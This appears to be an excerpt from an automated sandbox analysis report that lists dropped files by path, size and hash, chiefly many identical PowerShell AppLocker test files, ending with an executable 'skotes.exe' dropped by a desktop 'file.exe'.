Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cp5aut10.3i5.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cyioasi1.xuw.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dyjgdgik.dxt.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_er3310lx.xg3.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eroh1riz.wmf.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f1nggoo2.0ej.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fbbywwo3.3ao.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fn0cita4.g42.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gsxq3qs5.1gh.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gt2g1xqf.1pb.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_itmuuwtr.nn4.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kb4os1sx.wko.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_klfhpbzg.nrq.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kujv3rbb.ebp.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kvft5xfg.2tn.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m3dzmp4g.x1g.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mk5zszna.ufi.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nxo5h23q.fhh.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_owx1qiqr.n05.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_puykvtzb.koo.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q3yzif02.013.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rejzfcda.huw.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_riwtefiz.jbh.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s5uipotg.35w.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sizbwqeh.fr4.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_snwm4cnn.qln.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ugkn0ssf.mtm.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uy0td0s2.afr.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v3uopl1y.o4x.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wkeyfbxi.t2s.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xdonoquf.gkh.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zjm543ke.d1v.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3312128
Entropy (8bit):	6.666880127434823
Encrypted:	false
SSDEEP:	49152:BTMxAHE1CwGlAyzR/Bl2fkYdE7u4oUkJrYWH4w7rsF:BBk1hGlAyzR/BwfkYdE64w4
MD5:	7638E458B00BE1A00936AB9419267621
SHA1:	AF82D1C612DC47FB72A4798CBC42057BCC941602
SHA-256:	12DF5F413434F02531F88B0727B96AE8D4ED3C278FC81583DBFD4C0145B43E74
